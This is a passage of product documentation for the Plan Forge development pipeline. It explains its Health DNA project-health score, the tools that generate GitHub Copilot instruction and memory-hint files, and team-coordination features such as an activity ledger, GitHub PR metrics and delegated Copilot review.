Bug Registry: scanner-eligible defects auto-register via forge_bug_register.
Health DNA: run metrics (duration, gate failures, drift score) feed the daily Health DNA fingerprint.

Testbed ≠ CI. Your CI system runs against pull requests and controls the green/red light for merging. The Testbed runs against Plan Forge itself, under a library of synthetic scenarios, to ensure the pipeline still produces shippable code across upgrades.

Glowing golden DNA double-helix made of forge-glyphs (gauges, hammers, shields, gears) inside a translucent crystal vial, the Health DNA composite fingerprint

LiveGuard Health tab, composite health gauge, 30-day drift trend, MTTBF, and per-component metrics from forge_health_trend

Act IV, Learn · Chapter 25

Health DNA

A single fingerprint for "how healthy is this project today?", persisted, trended, compared.

New here? Plain-English version. A project can look fine on the surface and still be slowly rotting underneath. Tests are passing, but every plan run costs a little more. No incidents this week, but architectural drift is creeping up. Health DNA is a daily checkup that combines five different health signals into one score (0–100) so you can spot the slow decay before it becomes a crisis.

What it measures: drift, incidents, test pass rate, AI model success rate, and cost per slice. Five numbers, one composite score.
Why one number? Any single metric can lie (100% green tests + drowning in drift). The composite catches the lie.
What you do with it: the LiveGuard dashboard plots the score over time. A 7-day downward trend is the early warning to slow down and clean up before shipping more features.

Tool: forge_health_trend (LiveGuard), writes .forge/health-dna.jsonl. Intent: health-dna. Aliases: health-analysis, system-health, health-report.

Why a Fingerprint?

Any single metric can lie. A project with 100% green tests can still be drowning in drift. A healthy drift score can mask a CVE backlog. The Health DNA combines five independent signals into one daily fingerprint so that slow decay (the kind where everything looks fine but tomorrow's plan costs 2× yesterday's) becomes visible.

The Five Signals

Figure 25-1. Health DNA composite scoring

Signal	Source	What it catches
Drift score	`forge_drift_report`	Architecture diverging from plan baseline
Incident rate	`forge_incident_capture`	Production failures over trailing window
Test pass rate	CI + testbed findings	Regression risk
Model success rate	Orchestrator telemetry	Agent failures + escalation frequency
Cost per slice	Cost ledger	Token-burn creep, the project getting harder to reason about

Record Shape

.forge/health-dna.jsonl, one record

{
  "timestamp": "2026-04-20T00:00:00Z",
  "driftScore":       0.91,
  "incidentRate7d":   0,
  "testPassRate":     0.998,
  "modelSuccessRate": 0.96,
  "costPerSlice":     0.34,
  "composite":        0.93,
  "delta7d":          -0.02,
  "delta30d":         -0.08
}

composite is a weighted blend computed inside forge_health_trend (current default weights: drift 0.30, incident-rate 0.25, test-pass 0.20, model-success 0.15, cost 0.10; see pforge-mcp/server.mjs). delta7d and delta30d compare against historical records: a small negative delta is noise; a sustained negative delta is decay.
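To make the weighted blend concrete, here is a minimal sketch that applies the default weights quoted above. The weights come from the text; the two normalization helpers (`incidentScore`, `costScore`) are assumptions, since this chapter does not say how incident rate and cost are mapped onto a 0–1 scale. Under those assumed mappings the sample record happens to come out at 0.93, but that does not confirm the real formula in pforge-mcp/server.mjs.

```javascript
// Default weights quoted in the text above (they sum to 1.0).
const WEIGHTS = { drift: 0.30, incident: 0.25, testPass: 0.20, modelSuccess: 0.15, cost: 0.10 };

// ASSUMPTION: how raw values become 0..1 "higher is better" scores.
// These two helpers are illustrative, not the real implementation.
const incidentScore = (incidentRate7d) => 1 / (1 + incidentRate7d); // 0 incidents -> 1
const costScore = (costPerSlice) => Math.max(0, 1 - costPerSlice);  // cheaper -> closer to 1

function composite(record) {
  return (
    WEIGHTS.drift * record.driftScore +
    WEIGHTS.incident * incidentScore(record.incidentRate7d) +
    WEIGHTS.testPass * record.testPassRate +
    WEIGHTS.modelSuccess * record.modelSuccessRate +
    WEIGHTS.cost * costScore(record.costPerSlice)
  );
}

// Signal values copied from the sample record above.
const sample = {
  driftScore: 0.91,
  incidentRate7d: 0,
  testPassRate: 0.998,
  modelSuccessRate: 0.96,
  costPerSlice: 0.34,
};
console.log(composite(sample).toFixed(2)); // "0.93"
```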

Decay Detection

The watcher can alert on Health DNA thresholds:

delta7d < -0.10: short-term regression, usually tied to a specific slice.
delta30d < -0.15: long-term decay, usually architectural.
composite < 0.60: absolute floor; blocks new executions until addressed.
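The three thresholds translate directly into a small check. This is a sketch only: the threshold values come from the list above, while the `healthAlerts` function and the shape of the alert objects are hypothetical.

```javascript
// Thresholds are the ones listed above; the alert object shape is hypothetical.
function healthAlerts(record) {
  const alerts = [];
  if (record.delta7d < -0.10) {
    alerts.push({ rule: "delta7d", kind: "short-term regression", blocking: false });
  }
  if (record.delta30d < -0.15) {
    alerts.push({ rule: "delta30d", kind: "long-term decay", blocking: false });
  }
  if (record.composite < 0.60) {
    // The absolute floor is the only rule described as blocking new executions.
    alerts.push({ rule: "composite", kind: "absolute floor", blocking: true });
  }
  return alerts;
}

// The sample record from "Record Shape" trips none of the three rules.
console.log(healthAlerts({ composite: 0.93, delta7d: -0.02, delta30d: -0.08 })); // []
```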

Dashboard

The LiveGuard dashboard's Health tab renders the composite score as a sparkline, with per-signal sub-lines toggleable. The Forge Intelligence page cross-references Health DNA with the OpenBrain memory corpus: "your drift score dropped the day you added the new caching layer" is exactly the kind of conclusion the Learn station exists to surface.

Why JSONL, not JSON? Health DNA is append-only by design: every run writes one line. The file rotates on size (rather than via a built-in trim tool). That way a rolled-back slice doesn't also roll back the memory of how sick the project was before the rollback.
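Because the file is one JSON object per line, reading the history back is a split-and-parse. The sketch below also shows one plausible way a delta could be derived from that history. The baseline rule (compare against the most recent record that is at least N days old) is an assumption, and `parseJsonl` and `deltaOver` are hypothetical helper names.

```javascript
// Parse JSON Lines text: one record per non-empty line.
function parseJsonl(text) {
  return text
    .split("\n")
    .filter((line) => line.trim() !== "")
    .map((line) => JSON.parse(line));
}

// ASSUMPTION: a delta compares the latest composite with the most recent
// record that is at least `days` old. Returns null when history is too short.
function deltaOver(records, days) {
  const latest = records[records.length - 1];
  const cutoff = Date.parse(latest.timestamp) - days * 24 * 60 * 60 * 1000;
  const baseline = [...records].reverse().find((r) => Date.parse(r.timestamp) <= cutoff);
  return baseline ? latest.composite - baseline.composite : null;
}

// Illustrative history, oldest first (values invented for the example).
const history = parseJsonl(
  [
    '{"timestamp":"2026-04-13T00:00:00Z","composite":0.95}',
    '{"timestamp":"2026-04-19T00:00:00Z","composite":0.94}',
    '{"timestamp":"2026-04-20T00:00:00Z","composite":0.93}',
  ].join("\n")
);
console.log(deltaOver(history, 7).toFixed(2)); // "-0.02"
console.log(deltaOver(history, 30));           // null
```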

Three interlocking bronze rings labeled INSTRUCTIONS, MEMORIES, and SKILLS hovering above a glowing forge anvil with amber sparks orbiting where the rings overlap

Chapter 26 · Act V, Integrate

The Copilot Integration Trilogy

How Plan Forge teaches GitHub Copilot about your project: three tools, two generated files, one dashboard tab, zero manual setup after the first run.

Part V is integration material, not sequential lessons. These four chapters (Copilot Integration, Team Coordination, Knowledge Graph, Integrating from Outside) each declare their own prerequisites in the lede; read them in whatever order matches the integration you're doing. The expected baseline across Part V is Parts I–IV: you've shipped at least one plan, you know what Crucible (Ch 5), Bug Registry (Ch 21), and Memory (Ch 22) are, and you've poked the Dashboard (Ch 7) at least once.

The Copilot integration trilogy. Three components: forge_sync_memories, forge_sync_instructions, and the Settings → Copilot dashboard tab. Together they make every new Copilot conversation start with full project context, no manual context-paste, no copy-and-rebuild instruction files.

Why a trilogy?

GitHub Copilot reads two files automatically when you open a workspace:

.github/copilot-instructions.md: "what you must always know about this project". Architectural rules, naming conventions, build commands, security commitments.
.github/copilot-memory-hints.md: "what we've learned from doing this work". Trajectories from prior plans, recurring patterns, auto-skills extracted from successful slices.

Both files predate Plan Forge; you can hand-author them. But hand-authoring means: (a) they go stale the moment you ship the next plan, (b) every team member writes a slightly different one, and (c) when the underlying decisions change in .forge.json or PROJECT-PRINCIPLES.md, nothing reminds you to regenerate.

The trilogy solves all three problems by making both files build outputs, not human-authored sources:

Tool	Writes	Reads from	Run when
`forge_sync_instructions`	`.github/copilot-instructions.md`	project profile, principles, extra `.instructions.md` files, `.forge.json`	Architectural rules change
`forge_sync_memories`	`.github/copilot-memory-hints.md`	trajectories (`.forge/trajectories/`), auto-skills, brain entries	After each plan ships
Settings → Copilot tab	— (preview + apply both above)	live state from the two tools	Anytime you want to inspect before applying

One-liner: forge_sync_instructions handles the "always true" facts; forge_sync_memories handles the "we learned this last week" facts. The dashboard tab handles "let me look before I commit".

The data flow

Figure 26-1. Copilot Integration Trilogy, three sources, three tools, three artifacts

Both tools are idempotent and additive. They use content-hash deduplication, so running the same sync twice in a row produces zero file changes. They also use atomic write (temp file + rename), so a crash mid-write never leaves a half-baked file.
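The two guarantees in the paragraph above (no write when the content hash is unchanged, and temp-file-plus-rename for the write itself) can be sketched against an in-memory file store. Everything here is a stand-in: `syncFile` is a hypothetical helper, the `Map` replaces the file system, and a small FNV-1a hash is swapped in for the sha256 hash the tools report, purely to keep the sketch dependency-free.

```javascript
// Stand-in content hash (32-bit FNV-1a). The tools report sha256 hashes;
// this is swapped in only so the sketch needs no imports.
function contentHash(text) {
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return "fnv1a:" + h.toString(16).padStart(8, "0");
}

// `files` is a Map acting as a hypothetical in-memory file system.
function syncFile(files, path, content, { force = false } = {}) {
  const hash = contentHash(content);
  const existing = files.get(path);
  // Dedup: identical content means no write at all, unless forced.
  if (!force && existing !== undefined && contentHash(existing) === hash) {
    return { ok: true, written: false, contentHash: hash };
  }
  // Stage the full content under a temp name, then swap it into place.
  // On a real file system the swap would be a single rename(tmp, path).
  const tmp = path + ".tmp";
  files.set(tmp, content);
  files.set(path, files.get(tmp));
  files.delete(tmp);
  return { ok: true, written: true, path, contentHash: hash };
}

const files = new Map();
console.log(syncFile(files, ".github/copilot-instructions.md", "# v1").written); // true
console.log(syncFile(files, ".github/copilot-instructions.md", "# v1").written); // false
```

Readers only ever see the old file or the complete new one, which is why a crash between staging and swapping cannot leave a half-written file at the target path.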

`forge_sync_instructions` — the "always true" file

forge_sync_instructions generates .github/copilot-instructions.md by composing four sources, in this order:

Project Profile (docs/plans/PROJECT-PROFILE.md): the tech stack, build commands, key paths. Generated once via the project-profile.prompt.md in Session 1.
Project Principles (docs/plans/PROJECT-PRINCIPLES.md): non-negotiable architectural and engineering commitments. Generated via project-principles.prompt.md.
Extra instruction files (.github/instructions/*.instructions.md): auto-loaded by Copilot via their applyTo frontmatter. The trilogy stitches the relevant ones into the master file so Copilot sees them as a single context.
.forge.json commitments: tech choices that the project has locked in (e.g. "database": "postgres", "frontend": "react").

The output is a single Markdown file of roughly 150–400 lines (depending on profile complexity) with a deterministic structure: Identity → Stack → Build commands → Architectural rules → Forbidden patterns → Cost guardrails → Talking to Plan Forge tools.

Running it

Terminal · CLI

# Generate (preview only, does not write)
pforge sync-instructions --preview

# Generate and write
pforge sync-instructions

# Force overwrite even if file is identical (skips hash check)
pforge sync-instructions --force

From an agent · MCP

forge_sync_instructions({ preview: true })
// → { ok: true, written: false, diff: "...", contentHash: "sha256:..." }

forge_sync_instructions({ preview: false })
// → { ok: true, written: true, path: ".github/copilot-instructions.md", contentHash: "..." }

What the output looks like

The generated file follows a canonical template so that Copilot Chat's prompt-injection logic finds the same anchors every time:

# Instructions for Copilot

> **Project**: <name>
> **Stack**: <stack summary>
> **Generated by**: forge_sync_instructions @ v3.x

## Architecture Principles
<merged from architecture-principles.instructions.md + project-principles>

## Project Overview
<merged from PROJECT-PROFILE.md>

## Quick Commands
<merged from project profile + .forge.json>

## Coding Standards
<stack-specific from instructions/>

## Planning & Execution
<pipeline + prompts overview>

## Cost Estimates
<always-included; mandates forge_estimate_quorum>

## Talking to Forge-Master
<always-included; mandates forge_master_ask for open-ended reasoning>

`forge_sync_memories` — the "we learned this" file

forge_sync_memories generates .github/copilot-memory-hints.md by harvesting three runtime sources:

Trajectories (.forge/trajectories/*.jsonl): per-slice notes the worker left for itself: "I tried X, it failed because Y, so I switched to Z". These are the gold for "don't repeat this mistake" guidance.
Auto-skills (.forge/auto-skills/*.md): reusable patterns extracted by the Inner Loop. If three slices all needed the same shape of repository test, the fourth slice gets it for free as a skill, and Copilot Chat should know it exists too.
OpenBrain entries (L3, if configured): long-form lessons captured via forge_memory_capture or auto-stamped by tools like forge_run_plan.

Each source is filtered, hashed, deduped, and ranked by recency × signal strength. The output is bounded to ~80–120 lines so Copilot's context budget stays healthy.

Soft-sync, not hard-sync. The file is additive: the tool never deletes a hint a human added by hand. If you write a custom block between the <!-- pforge:custom --> / <!-- /pforge:custom --> markers, the sync tool preserves it verbatim. Only the <!-- pforge:auto --> region is regenerated.
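A minimal sketch of the soft-sync idea: rewrite only what sits between the auto markers and return everything else byte-for-byte. The marker strings are the ones used in the generated file; `regenerateAutoRegion` is a hypothetical helper, and refusing to write when the markers are missing is an assumption about sensible behavior, not documented tool behavior.

```javascript
const AUTO_OPEN = "<!-- pforge:auto -->";
const AUTO_CLOSE = "<!-- /pforge:auto -->";

// Replace only the text between the auto markers. Everything outside them,
// including any pforge:custom block, is returned untouched.
function regenerateAutoRegion(fileText, newAutoBody) {
  const start = fileText.indexOf(AUTO_OPEN);
  const end = fileText.indexOf(AUTO_CLOSE);
  if (start === -1 || end === -1 || end < start) {
    // ASSUMPTION: refuse rather than guess where the generated region is.
    throw new Error("auto markers not found; refusing to rewrite the file");
  }
  const before = fileText.slice(0, start + AUTO_OPEN.length);
  const after = fileText.slice(end);
  return `${before}\n${newAutoBody}\n${after}`;
}

const current = [
  "# Copilot Memory Hints",
  "<!-- pforge:auto -->",
  "- old hint",
  "<!-- /pforge:auto -->",
  "<!-- pforge:custom -->",
  "- hand-written hint",
  "<!-- /pforge:custom -->",
].join("\n");

console.log(regenerateAutoRegion(current, "- new hint"));
```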

Running it

Terminal · CLI

# After every plan ships
pforge sync-memories

# Limit to recent trajectories, here the last 14 days (default: last 50 trajectories)
pforge sync-memories --since=14d

# Verbose: show which entries were included/excluded and why
pforge sync-memories --explain

What the output looks like

# Copilot Memory Hints

> **Generated by**: forge_sync_memories @ v3.x
> **Last sync**: 2026-05-17T14:22:11Z · 47 trajectories, 12 auto-skills, 8 brain entries

<!-- pforge:auto -->

## Recently learned patterns
- **Snapshot pop** uses `git stash apply` + explicit drop, not blind `git stash pop` (lesson from #201)
- **Vitest output parser** ignores subagent hallucination markers (lesson from #198)
- ...

## Auto-skills available
- `repository-vitest-pattern`, generated 2026-05-12 from 4 slices
- `bicep-rbac-scaffold`, generated 2026-05-10 from 3 slices

<!-- /pforge:auto -->

<!-- pforge:custom -->
<!-- Anything you write here is preserved across syncs -->
<!-- /pforge:custom -->

The Settings → Copilot dashboard tab

If you'd rather see the diff before it lands, open the dashboard and navigate to Settings → Copilot. The tab gives you four panels:

Panel	Shows	Actions
Current file	Live content of `.github/copilot-instructions.md`	Read-only viewer with syntax highlighting
Preview regenerated	What `forge_sync_instructions` would write right now	Inline diff vs the current file
Memory hints	Live content of `copilot-memory-hints.md` + count of entries by source	"Regenerate now" button → calls `forge_sync_memories`
Apply	Confirmation banner with the hash of what's about to be written	"Sync instructions" / "Sync memories" / "Sync both" buttons

Backed by three REST endpoints (full reference: Appendix W — Copilot integration):

GET  /api/copilot-instructions         # read current file
POST /api/copilot-instructions/preview # generate without writing
POST /api/copilot-instructions/sync    # generate + write atomically

When to run what

Event	Run	Why
Initial project setup	`sync-instructions`	Bootstraps Copilot with stack + commands
After edits to `PROJECT-PROFILE.md` or `PROJECT-PRINCIPLES.md`	`sync-instructions`	Architectural facts changed
After a plan ships	`sync-memories`	New trajectories, possibly new auto-skills
Weekly maintenance	Both	Catch drift; safe even if nothing changed (hash dedup skips no-op writes)
CI on `main` push	Both, with `--preview` + fail-on-diff	Catches "developer forgot to sync after editing PRINCIPLES"
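The "fail-on-diff" CI row can be sketched as a small decision function over preview responses. This assumes each preview returns the shape shown earlier for forge_sync_instructions ({ ok, written, diff, contentHash }), that forge_sync_memories previews look the same, and that `diff` is an empty string when the committed file is already current. None of that is confirmed here, and `checkSynced` is a hypothetical helper.

```javascript
// ASSUMPTION: every preview response looks like
// { ok, written, diff, contentHash } and `diff` is "" when nothing changed.
function checkSynced(previews) {
  const stale = Object.entries(previews)
    .filter(([, response]) => !response.ok || response.diff !== "")
    .map(([name]) => name);
  // A non-zero exit code is what makes the CI job fail.
  return { exitCode: stale.length === 0 ? 0 : 1, stale };
}

const result = checkSynced({
  instructions: { ok: true, written: false, diff: "", contentHash: "sha256:..." },
  memories: { ok: true, written: false, diff: "+ - new hint", contentHash: "sha256:..." },
});
console.log(result); // { exitCode: 1, stale: [ 'memories' ] }
```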

Automation pattern: wire pforge sync-memories into the PostSlice hook (already shipped in templates/.github/hooks/PostSlice.md). Every successful slice now feeds the next Copilot conversation. Zero manual upkeep.

Capability summary

For the full tool-by-tool reference, see docs/capabilities.md on GitHub. The three trilogy surfaces, at a glance:

Surface	MCP tool	CLI	REST	Since
Memory hints	`forge_sync_memories`	`pforge sync-memories`	— (CLI-only)	v2.99
Instructions	`forge_sync_instructions`	`pforge sync-instructions`	`POST /api/copilot-instructions/sync`	v3.0
Dashboard tab	— (UI)	— (UI)	`GET /api/copilot-instructions` `POST /api/copilot-instructions/preview`	v3.1

See also: Chapter 22 — How the Shop Remembers for the full L1/L2/L3 memory architecture this trilogy sits on top of. Dashboard — Settings for the full Settings tab walkthrough. Chapter 9 — Customization for how to add your own custom blocks to the generated files.

A vast bronze great hall with five forges arranged in a semicircle, each tended by a hooded smith with a glowing rune overhead, threads of amber light connecting their anvils into a knowledge-sharing web

Chapter 27 · Act V, Integrate

Team Coordination

Two developers running Plan Forge on the same repo at the same time hit three predictable problems: concurrent edits collide at merge time, hard-won fixes stay trapped in one developer's local .forge/, and a productive day turns every reviewer into a bottleneck. This chapter shows how Plan Forge solves all three with a single shared file and a few GitHub API calls, no SaaS backend, no shared database, no new identity system.

How it's built (v2.93 → v3.4). Five surfaces compose the team layer: forge_team_dashboard + forge_team_activity (per-developer visibility), forge_github_metrics + forge_github_status (PR throughput + validation stack), forge_delegate_review (dispatching review to Copilot's cloud agent), and forge_classifier_issue (closing the tempering audit loop by filing a GitHub issue when a classifier rule needs to land).

The "shared shop" problem

The three coordination problems in detail:

Concurrent edits. Two developers might pick the same plan, or pick plans whose Scope Contracts touch the same files. Without visibility, you discover the conflict at merge time.
Lost institutional memory. Alice solves a tricky gate-portability issue on Monday. Bob hits the same issue on Wednesday because Alice's trajectory lives in her local .forge/.
Review fatigue. Plan Forge runs are productive: a single afternoon can ship 4 plans. If every plan needs a human reviewer, the bottleneck moves from "writing code" to "reviewing code".

v3.x addresses each, in order: team dashboard for visibility, shared activity ledger + memory sync for institutional memory, delegated review for the review bottleneck.

The activity ledger

Everything starts with one file: .forge/team-activity.jsonl. It is an append-only JSON Lines log that every Plan Forge operation writes to. One event per line, never edited, never compacted.

Figure 27-1. Team coordination, many writers, one ledger, four readers

{"ts":"2026-05-17T09:14:22Z","actor":"alice@example.com","action":"plan.start","plan":"Phase-31","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:18:41Z","actor":"alice@example.com","action":"slice.commit","plan":"Phase-31","slice":"2","sha":"e4f5a6b"}
{"ts":"2026-05-17T09:31:02Z","actor":"bob@example.com","action":"plan.start","plan":"Phase-32","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:33:11Z","actor":"alice@example.com","action":"plan.complete","plan":"Phase-31","slices":6,"costUsd":2.41}

The file is small (typical: 50–200 KB per team-week), git-friendly (line-stable), and trivially indexable. Every team query in this chapter is a streaming read of this file.

Where it lives. By default, .forge/team-activity.jsonl is not gitignored; that's the point. Commit it. The ledger is most useful when every developer's events land in one shared history. If you don't want it in git, set team.ledger.gitignore: true in .forge.json and use a side channel (S3, shared volume) instead.

`forge_team_dashboard` — per-developer cards

forge_team_dashboard reduces the ledger into one card per developer, capturing the last 7 days (default; configurable):

forge_team_dashboard({ windowDays: 7 })

// Response shape (excerpt):
{
  generatedAt: "2026-05-17T14:00:00Z",
  windowDays: 7,
  developers: [
    {
      actor: "alice@example.com",
      lastActive: "2026-05-17T09:33:11Z",
      runs: 12,
      successRate: 0.917,
      costUsd: 28.40,
      plans: ["Phase-31", "Phase-30", "Phase-29"],
      activePlan: null
    },
    {
      actor: "bob@example.com",
      lastActive: "2026-05-17T09:31:02Z",
      runs: 4,
      successRate: 1.0,
      costUsd: 6.12,
      plans: ["Phase-32"],
      activePlan: "Phase-32"      // currently running
    }
  ],
  totals: { runs: 16, successRate: 0.938, costUsd: 34.52 }
}

This is what backs the Team dashboard tab: one card per developer, sorted by recency, with a visual badge for "currently running a plan". The same shape powers the pforge team-dashboard CLI command for terminal users.
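The `totals` row in the response excerpt is consistent with a run-weighted roll-up of the developer cards. The sketch below reproduces those numbers under that assumption; the weighting rule and the `teamTotals` helper are not taken from the tool's source.

```javascript
// ASSUMPTION: totals.successRate is weighted by each developer's run count.
function teamTotals(developers) {
  const runs = developers.reduce((sum, d) => sum + d.runs, 0);
  const succeeded = developers.reduce((sum, d) => sum + d.runs * d.successRate, 0);
  const cost = developers.reduce((sum, d) => sum + d.costUsd, 0);
  return {
    runs,
    successRate: runs === 0 ? null : Math.round((succeeded / runs) * 1000) / 1000,
    costUsd: Math.round(cost * 100) / 100,
  };
}

// Values copied from the two developer cards in the response excerpt.
const cards = [
  { actor: "alice@example.com", runs: 12, successRate: 0.917, costUsd: 28.40 },
  { actor: "bob@example.com", runs: 4, successRate: 1.0, costUsd: 6.12 },
];
console.log(teamTotals(cards)); // { runs: 16, successRate: 0.938, costUsd: 34.52 }
```

A plain average of the two success rates would give 0.959, so the weighting matters whenever developers have very different run counts.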

Above the cards, the dashboard renders a conflict-risk banner computed from the active plans of any two developers running simultaneously. The risk score is derived from Scope Contract overlap:

Score	Trigger	Banner
none	No active plans, or disjoint Scope Contracts	(hidden)
low	Active plans touch sibling files in the same directory	"Alice and Bob are both working in `src/orders/`, sync up before merge."
medium	Active plans share at least one file path	"⚠️ Alice and Bob are both editing `src/orders/repository.ts`."
high	Active plans share files AND share modified symbols (per `forge_diff`)	"🚨 High collision risk. One of you should pause."
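The four risk levels in the table can be expressed as a small classifier. This is a sketch under assumptions: each active plan is reduced to a list of file paths plus a list of modified symbol names, which is a hypothetical simplification of what Scope Contracts and forge_diff actually provide, and `conflictRisk` is not a real tool.

```javascript
// ASSUMPTION: an active plan is summarized as { files: [...], symbols: [...] }.
function dirOf(path) {
  const i = path.lastIndexOf("/");
  return i === -1 ? "" : path.slice(0, i);
}

function conflictRisk(planA, planB) {
  // No active plans on one side means nothing can collide.
  if (!planA || !planB) return "none";
  const sharedFiles = planA.files.filter((f) => planB.files.includes(f));
  if (sharedFiles.length > 0) {
    // Shared files plus shared modified symbols is the "high" row.
    const sharedSymbols = planA.symbols.filter((s) => planB.symbols.includes(s));
    return sharedSymbols.length > 0 ? "high" : "medium";
  }
  // Different files in the same directory is the "low" row.
  const dirsB = new Set(planB.files.map(dirOf));
  return planA.files.some((f) => dirsB.has(dirOf(f))) ? "low" : "none";
}

console.log(
  conflictRisk(
    { files: ["src/orders/repository.ts"], symbols: ["findOrder"] },
    { files: ["src/orders/service.ts"], symbols: ["placeOrder"] }
  )
); // "low"
```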

`forge_team_activity` — querying the ledger

Where forge_team_dashboard aggregates, forge_team_activity queries. Pass any combination of filters:

forge_team_activity({
  actor:   "alice@example.com",   // optional, who
  plan:    "Phase-31",            // optional, what
  action:  "slice.commit",        // optional, kind
  since:   "2026-05-10T00:00:00Z",// optional, when
  limit:   100,                   // bounded; default 50, max 1000
  cursor:  null                   // pagination
})

// Response:
{
  events: [ /* event objects */ ],
  total: 47,
  hasMore: false,
  cursor: null
}

This is the tool to reach for when answering questions like "what did Alice work on last week?" or "show me every slice that Phase-31 took and who ran which retry". It is also the data source for the pforge team-activity CLI and the GET /api/team/activity REST endpoint.
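Since every team query is described as a streaming read of the ledger, the filter semantics can be sketched over an in-memory array of events. The filter names, the default of 50, and the cap of 1000 come from the call above; treating the cursor as a plain offset is an assumption, and `queryActivity` is a hypothetical stand-in for the real tool.

```javascript
function queryActivity(events, { actor, plan, action, since, limit = 50, cursor = null } = {}) {
  const pageSize = Math.min(Math.max(limit, 1), 1000); // default 50, capped at 1000
  const matches = events.filter(
    (e) =>
      (actor == null || e.actor === actor) &&
      (plan == null || e.plan === plan) &&
      (action == null || e.action === action) &&
      (since == null || Date.parse(e.ts) >= Date.parse(since))
  );
  // ASSUMPTION: the cursor is a plain offset into the filtered list.
  const offset = cursor ?? 0;
  const page = matches.slice(offset, offset + pageSize);
  const next = offset + page.length;
  const hasMore = next < matches.length;
  return { events: page, total: matches.length, hasMore, cursor: hasMore ? next : null };
}

// The four sample ledger events from earlier in the chapter (fields trimmed).
const ledger = [
  { ts: "2026-05-17T09:14:22Z", actor: "alice@example.com", action: "plan.start", plan: "Phase-31" },
  { ts: "2026-05-17T09:18:41Z", actor: "alice@example.com", action: "slice.commit", plan: "Phase-31" },
  { ts: "2026-05-17T09:31:02Z", actor: "bob@example.com", action: "plan.start", plan: "Phase-32" },
  { ts: "2026-05-17T09:33:11Z", actor: "alice@example.com", action: "plan.complete", plan: "Phase-31" },
];
console.log(queryActivity(ledger, { actor: "alice@example.com" }).total); // 3
```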

`forge_github_metrics` + `forge_github_status`

The activity ledger captures everything that happens inside Plan Forge. forge_github_metrics and forge_github_status capture everything that happens around it: PR throughput, review latency, CI validation results.

`forge_github_metrics`

Pulls PR-level analytics from the GitHub API:

PRs opened / merged / closed in window
Time-to-first-review per PR (median + p95)
Time-to-merge per PR (median + p95)
Review iteration count distribution
Per-author breakdown matching the team ledger's actor identities

The dashboard's GH Metrics tab is a thin renderer over this tool's response.

`forge_github_status`

The validation stack on a single PR. Given a PR number, returns:

Required and optional checks with their current state
Review status (approved / changes-requested / pending) by reviewer
Mergeable state including conflicts
Branch protection rule violations (if any)
Linked issues + their open/closed status

Composable pattern: chain forge_team_activity({ action: "plan.complete" }) → for each plan, find its PR → forge_github_status({ pr: N }). This gives you a single-pane view of "what shipped last week and what state is each PR in".

`forge_delegate_review` — dispatching to Copilot

Plan Forge's reviewer step (the Reviewer Gate) is independent: a fresh session reads the plan's Scope Contract and audits the diff. By default it runs locally. forge_delegate_review dispatches the same audit task to the GitHub Copilot cloud coding agent, so the review happens server-side and the result lands as a PR comment.

forge_delegate_review({
  pr: 247,
  plan: "docs/plans/Phase-31-PLAN.md",
  scope: "scope-contract",   // or "full-plan" | "diff-only"
  blockOn: "critical"        // file CHANGES_REQUESTED on critical findings
})

// Response:
{
  ok: true,
  jobId: "copilot-job-7f3a...",
  dispatched: "2026-05-17T14:22:11Z",
  pr: 247,
  estimatedCompletion: "2026-05-17T14:27:00Z"
}

Configuration lives under cloudAgentValidation in .forge.json:

{
  "cloudAgentValidation": {
    "enabled": true,
    "agent": "copilot",              // current option: copilot
    "trigger": "post-slice-commit",  // when to dispatch
    "blockOn": "critical",
    "timeoutMinutes": 15,
    "fallback": "local-reviewer"     // if cloud dispatch fails
  }
}

Why "delegate" and not "replace"? The local Reviewer Gate is faster and cheaper (your tokens, your machine). The cloud agent is asynchronous, shareable, and produces a PR comment that everyone on the team sees. Use the local reviewer in tight inner-loop iterations; use delegation when shipping for human-team review.

`forge_classifier_issue` — closing the audit loop

The tempering subsystem (Audit Loop chapter) audits classifier output and finds false-positive findings or missed-detection rules. Once tempering has confirmed a rule is needed, forge_classifier_issue files a structured GitHub issue against the rule repository so the rule lands in code, not in a side note.

forge_classifier_issue({
  classifier:  "audit",
  ruleId:      "audit-stub-detection",
  category:    "missed-detection",      // or "false-positive"
  evidence:    [ /* before/after finding pairs */ ],
  severity:    "high",
  rationale:   "Three sweeps in a row missed inline TODO markers in JSX comments."
})

// Response:
{
  ok: true,
  issueNumber: 312,
  issueUrl: "https://github.com/.../issues/312",
  deduped: false,
  hash: "sha256:..."
}

The tool deduplicates against open issues with the same rule + category hash within 14 days, so repeated audit findings don't spam the tracker. This is the official "self-repair" path for classifier rules, analogous to forge_meta_bug_file for plan/orchestrator/prompt defects.
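The 14-day dedup rule can be sketched as a lookup over open issues. The window length and the "same rule + category" criterion come from the paragraph above; the key format, the issue object shape, and the `findDuplicate` helper are assumptions made for illustration.

```javascript
const DEDUP_WINDOW_MS = 14 * 24 * 60 * 60 * 1000;

// ASSUMPTION: the dedup key is derived from rule id + category only.
const dedupKey = (ruleId, category) => `${ruleId}::${category}`;

// Returns the matching open issue, or null when a new issue should be filed.
function findDuplicate(openIssues, ruleId, category, now) {
  const key = dedupKey(ruleId, category);
  return (
    openIssues.find(
      (issue) => issue.key === key && now - Date.parse(issue.createdAt) <= DEDUP_WINDOW_MS
    ) ?? null
  );
}

// Hypothetical open-issue record for the example call shown earlier.
const openIssues = [
  { number: 312, key: dedupKey("audit-stub-detection", "missed-detection"), createdAt: "2026-05-10T00:00:00Z" },
];
const now = Date.parse("2026-05-17T00:00:00Z");
console.log(findDuplicate(openIssues, "audit-stub-detection", "missed-detection", now).number); // 312
```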

Where to find this in the dashboard

Tab	Backed by	Surfaces
Team	`forge_team_dashboard`	Per-developer cards, conflict-risk banner, "currently running" badges
Team Activity	`forge_team_activity`	Timeline view of the ledger with filter chips
GH Metrics	`forge_github_metrics`	PR throughput, review latency, per-author breakdown
PR Status (drill from any PR link)	`forge_github_status`	Required checks, reviewers, mergeability

CLI summary

pforge team-dashboard              # per-developer cards in the terminal
pforge team-dashboard --json       # machine-readable
pforge team-activity --since=7d    # query the ledger
pforge team-activity --actor=alice@example.com --action=slice.commit
pforge gh-metrics --window=30d     # PR throughput
pforge gh-status --pr=247          # validation stack for one PR
pforge delegate-review --pr=247 --plan=docs/plans/Phase-31-PLAN.md

See also: The Audit Loop for how tempering produces the findings that forge_classifier_issue dispatches. Chapter 26 — The Copilot Integration Trilogy for how shared memory hints close the "Bob hits Alice's bug" gap. Chapter 7 — The Dashboard for the full tab tour.

